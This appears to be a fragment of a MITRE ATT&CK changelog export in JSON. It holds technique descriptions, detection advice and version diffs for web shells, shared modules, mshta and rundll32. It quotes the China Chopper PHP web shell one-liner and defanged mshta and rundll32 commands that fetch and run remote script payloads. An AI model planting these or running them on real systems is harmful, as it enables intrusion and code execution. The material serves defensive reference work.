| > | e> while user level are written to <code>~/.config/systemd/u | > | aged by the systemd system and service manager.(Citation: Li | ||
| > | ser/</code>. An adversary may use systemd timers to execute | > | nux man-pages: systemd January 2014) Privileged timers are w | ||
| > | malicious code at system startup or on a scheduled basis fo | > | ritten to <code>/etc/systemd/system/</code> and <code>/usr/l | ||
| > | r persistence.(Citation: Arch Linux Package Systemd Compromi | > | ib/systemd/system</code> while user level are written to <co | ||
| > | se BleepingComputer 10JUL2018)(Citation: gist Arch package c | > | de>~/.config/systemd/user/</code>. An adversary may use sys | ||
| > | ompromise 10JUL2018)(Citation: acroread package compromised | > | temd timers to execute malicious code at system startup or o | ||
| > | Arch Linux Mail 8JUL2018) Timers installed using privileged | > | n a scheduled basis for persistence.(Citation: Arch Linux Pa | ||
| > | paths may be used to maintain root level persistence. Advers | > | ckage Systemd Compromise BleepingComputer 10JUL2018)(Citatio | ||
| > | aries may also install user level timers to achieve user lev | > | n: gist Arch package compromise 10JUL2018)(Citation: acrorea | ||
| > | el persistence. | > | d package compromised Arch Linux Mail 8JUL2018) Timers insta | ||
| > | lled using privileged paths may be used to maintain root lev | ||||
| > | el persistence. Adversaries may also install user level time | ||||
| > | rs to achieve user level persistence. |
<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nFile monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\n\nLog authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"SYSTEM",
"User"
],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
],
"x_mitre_system_requirements": [
"Adversary access to Web server with vulnerability or account to upload and serve the Web shell file."
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Arnim Rupp, Deutsche Lufthansa AG\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-07-26 13:46:47.993000+00:00\", \"old_value\": \"2020-09-16 19:34:19.752000+00:00\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"NSA Cyber Mitigating Web Shells\", \"old_value\": \"US-CERT Alert TA15-314A Web Shells\"}, \"root['external_references'][3]['description']\": {\"new_value\": \" NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.\", \"old_value\": \"US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://github.com/nsacyber/Mitigating-Web-Shells\", \"old_value\": \"https://www.us-cert.gov/ncas/alerts/TA15-314A\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \\n\\n<?php @eval($_POST['password']);>\\n\\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\\n\\nFile monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\\n\\nLog authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)\", \"old_value\": \"Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \\n\\n<?php @eval($_POST['password']);>\\n\\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) \", \"diff\": \"--- \\n+++ \\n@@ -2,4 +2,8 @@\\n \\n <?php @eval($_POST['password']);>\\n \\n-Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) \\n+Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\\n+\\n+File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\\n+\\n+Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][4]\": {\"source_name\": \"US-CERT Alert TA15-314A Web Shells\", \"description\": \"US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.\", \"url\": \"https://www.us-cert.gov/ncas/alerts/TA15-314A\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"changelog_mitigations": {
"shared": [],
"new": [
"M1018: User Account Management",
"M1042: Disable or Remove Feature or Program"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0015: Application Log (Application Log Content)",
"DS0022: File (File Creation)",
"DS0022: File (File Modification)",
"DS0029: Network Traffic (Network Traffic Content)",
"DS0029: Network Traffic (Network Traffic Flow)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:31:40.542000+00:00",
"modified": "2021-10-15 13:48:02.963000+00:00",
"name": "Shared Modules",
"description": "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1129",
"external_id": "T1129"
},
{
"source_name": "Wikipedia Windows Library Files",
"description": "Wikipedia. (2017, January 31). Microsoft Windows library files. Retrieved February 13, 2017.",
"url": "https://en.wikipedia.org/wiki/Microsoft_Windows_library_files"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Stefan Kanthak"
],
"x_mitre_data_sources": [
"Process: OS API Execution",
"Module: Module Load"
],
"x_mitre_detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "2.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 13:48:02.963000+00:00\", \"old_value\": \"2020-03-28 18:14:36.980000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\\n\\nThe module loader can load DLLs:\\n\\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\\n \\n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\\n \\n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\\n \\n* via <file name=\\\"filename.extension\\\" loadFrom=\\\"fully-qualified or relative pathname\\\"> in an embedded or external \\\"application manifest\\\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\\n\\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.\", \"old_value\": \"Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\\n\\nThe module loader can load DLLs:\\n\\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\\n \\n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\\n \\n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\\n \\n* via <file name=\\\"filename.extension\\\" loadFrom=\\\"fully-qualified or relative pathname\\\"> in an embedded or external \\\"application manifest\\\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\\n\\nAdversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1,4 @@\\n-Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\\n+Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)\\n \\n The module loader can load DLLs:\\n \\n@@ -10,4 +10,4 @@\\n \\n * via <file name=\\\"filename.extension\\\" loadFrom=\\\"fully-qualified or relative pathname\\\"> in an embedded or external \\\"application manifest\\\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\\n \\n-Adversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.\\n+Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
"previous_version": "2.0",
"version_change": "2.0 \u2192 2.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse shared modules to execute malicious pa | t | 1 | Adversaries may execute malicious payloads via loading share |
| > | yloads. The Windows module loader can be instructed to load | > | d modules. The Windows module loader can be instructed to lo | ||
| > | DLLs from arbitrary local paths and arbitrary Universal Nami | > | ad DLLs from arbitrary local paths and arbitrary Universal N | ||
| > | ng Convention (UNC) network paths. This functionality reside | > | aming Convention (UNC) network paths. This functionality res | ||
| > | s in NTDLL.dll and is part of the Windows [Native API](https | > | ides in NTDLL.dll and is part of the Windows [Native API](ht | ||
| > | ://attack.mitre.org/techniques/T1106) which is called from f | > | tps://attack.mitre.org/techniques/T1106) which is called fro | ||
| > | unctions like <code>CreateProcess</code>, <code>LoadLibrary< | > | m functions like <code>CreateProcess</code>, <code>LoadLibra | ||
| > | /code>, etc. of the Win32 API. (Citation: Wikipedia Windows | > | ry</code>, etc. of the Win32 API. (Citation: Wikipedia Windo | ||
| > | Library Files) The module loader can load DLLs: * via spec | > | ws Library Files) The module loader can load DLLs: * via s | ||
| > | ification of the (fully-qualified or relative) DLL pathname | > | pecification of the (fully-qualified or relative) DLL pathna | ||
| > | in the IMPORT directory; * via EXPORT forwarded to anot | > | me in the IMPORT directory; * via EXPORT forwarded to a | ||
| > | her DLL, specified with (fully-qualified or relative) pathna | > | nother DLL, specified with (fully-qualified or relative) pat | ||
| > | me (but without extension); * via an NTFS junction or s | > | hname (but without extension); * via an NTFS junction o | ||
| > | ymlink program.exe.local with the fully-qualified or relativ | > | r symlink program.exe.local with the fully-qualified or rela | ||
| > | e pathname of a directory containing the DLLs specified in t | > | tive pathname of a directory containing the DLLs specified i | ||
| > | he IMPORT directory or forwarded EXPORTs; * via <code>& | > | n the IMPORT directory or forwarded EXPORTs; * via <cod | ||
| > | #x3c;file name=\"filename.extension\" loadFrom=\"fully-qualifie | > | e><file name=\"filename.extension\" loadFrom=\"fully-quali | ||
| > | d or relative pathname\"></code> in an embedded or exter | > | fied or relative pathname\"></code> in an embedded or ex | ||
| > | nal \"application manifest\". The file name refers to an entry | > | ternal \"application manifest\". The file name refers to an en | ||
| > | in the IMPORT directory or a forwarded EXPORT. Adversaries | > | try in the IMPORT directory or a forwarded EXPORT. Adversar | ||
| > | may use this functionality as a way to execute arbitrary co | > | ies may use this functionality as a way to execute arbitrary | ||
| > | de on a victim system. For example, malware may execute shar | > | payloads on a victim system. For example, malware may execu | ||
| > | e modules to load additional components or features. | > | te share modules to load additional components or features. |
mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1218/005",
"external_id": "T1218.005"
},
{
"source_name": "Cylance Dust Storm",
"description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.",
"url": "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf"
},
{
"source_name": "Red Canary HTA Abuse Part Deux",
"description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.",
"url": "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/"
},
{
"source_name": "FireEye Attacks Leveraging HTA",
"description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.",
"url": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html"
},
{
"source_name": "Airbus Security Kovter Analysis",
"description": "Dove, A. (2016, March 23). Fileless Malware \u2013 A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.",
"url": "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/"
},
{
"source_name": "FireEye FIN7 April 2017",
"description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.",
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
},
{
"source_name": "Wikipedia HTML Application",
"description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.",
"url": "https://en.wikipedia.org/wiki/HTML_Application"
},
{
"source_name": "MSDN HTML Applications",
"description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.",
"url": "https://msdn.microsoft.com/library/ms536471.aspx"
},
{
"source_name": "LOLBAS Mshta",
"description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.",
"url": "https://lolbas-project.github.io/lolbas/Binaries/Mshta/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"@ionstorm",
"Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank",
"Ricardo Dias"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"File: File Creation",
"Command: Command Execution",
"Network Traffic: Network Connection Creation"
],
"x_mitre_defense_bypassed": [
"Application control",
"Digital Certificate Validation"
],
"x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 23:59:00.395000+00:00\", \"old_value\": \"2020-12-30 14:29:06.462000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][0]\": \"@ionstorm\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1038: Execution Prevention",
"M1042: Disable or Remove Feature or Program"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)",
"DS0022: File (File Creation)",
"DS0029: Network Traffic (Network Connection Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-23 18:03:46.248000+00:00",
"modified": "2021-10-14 21:45:53.057000+00:00",
"name": "Rundll32",
"description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1218/011",
"external_id": "T1218.011"
},
{
"source_name": "Trend Micro CPL",
"description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.",
"url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"
},
{
"source_name": "This is Security Command Line Confusion",
"description": "B. Ancel. (2014, August 20). Poweliks \u2013 Command Line Confusion. Retrieved March 5, 2018.",
"url": "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/"
},
{
"source_name": "Attackify Rundll32.exe Obscurity",
"description": "Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.",
"url": "https://www.attackify.com/blog/rundll32_execution_order/"
},
{
"source_name": "Github NoRunDll",
"description": "gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.",
"url": "https://github.com/gtworek/PSBits/tree/master/NoRunDll"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Gareth Phillips, Seek Ltd.",
"Casey Smith",
"Ricardo Dias"
],
"x_mitre_data_sources": [
"File: File Metadata",
"Process: Process Creation",
"Command: Command Execution",
"Module: Module Load"
],
"x_mitre_defense_bypassed": [
"Digital Certificate Validation",
"Application control",
"Anti-virus"
],
"x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-14 21:45:53.057000+00:00\", \"old_value\": \"2021-01-20 18:12:11.843000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\\n\\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\\n\\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write();GetObject(\\\"script:https[:]//www[.]example[.]com/malicious.sct\\\")\\\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\\n\\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)\", \"old_value\": \"Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\\n\\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\\n\\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write();GetObject(\\\"script:https[:]//www[.]example[.]com/malicious.sct\\\")\\\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,7 @@\\n-Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\\n+Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\\n \\n Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\\n \\n Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write();GetObject(\\\"script:https[:]//www[.]example[.]com/malicious.sct\\\")\\\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\\n+\\n+Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\\n\\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.\", \"old_value\": \"Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,3 @@\\n-Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.\\n+Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\\n+\\n+Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][3]\": {\"source_name\": \"Attackify Rundll32.exe Obscurity\", \"description\": \"Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.\", \"url\": \"https://www.attackify.com/blog/rundll32_execution_order/\"}, \"root['external_references'][4]\": {\"source_name\": \"Github NoRunDll\", \"description\": \"gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.\", \"url\": \"https://github.com/gtworek/PSBits/tree/master/NoRunDll\"}, \"root['x_mitre_contributors'][0]\": \"Gareth Phillips, Seek Ltd.\", \"root['x_mitre_data_sources'][0]\": \"File: File Metadata\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
